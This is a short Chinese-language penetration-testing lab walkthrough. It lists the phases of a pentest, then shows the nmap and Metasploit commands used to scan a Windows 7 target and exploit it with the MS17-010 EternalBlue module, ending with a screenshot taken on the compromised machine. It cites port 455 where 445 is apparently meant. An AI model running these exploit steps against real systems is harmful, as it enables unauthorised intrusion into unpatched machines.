一.渗透测试流程
渗透测试一般分为以下几步
1.前期交互阶段
2.情报收集阶段
3.危险建模阶段
4.漏洞分析阶段
5.渗透攻击阶段
6.后渗透攻击阶段(清除痕迹)
7.报告阶段
二.使用nmap进行扫描
攻击机 kali
靶机:wind7
wind7 使用wind + r 输入 cmd 调出小黑窗
输入 ipconfig 查看 wind7 的 ip
kali 输入 sudo su 进入root用户
再输入 nmap 目标ip 进行扫描
此时知道455端口是开放的,并且wind 7有个漏洞永恒之蓝
命令 msfconsole 打开msf的渗透攻击
搜索命令 search ms17-010
use auxiliary/scanner/smb/smb_ms17_010 进行扫描
show optiosn 查看配置项
set rhosts 目标ip 设置扫描目标
run 执行
再输入 use exploit/windows/smb/ms17_010_eternalblue 进行攻击模块
set rhosts 目标ip 设置目标
run 攻击执行
攻击成功
命令 screenshot 电脑截图
在文件夹中找到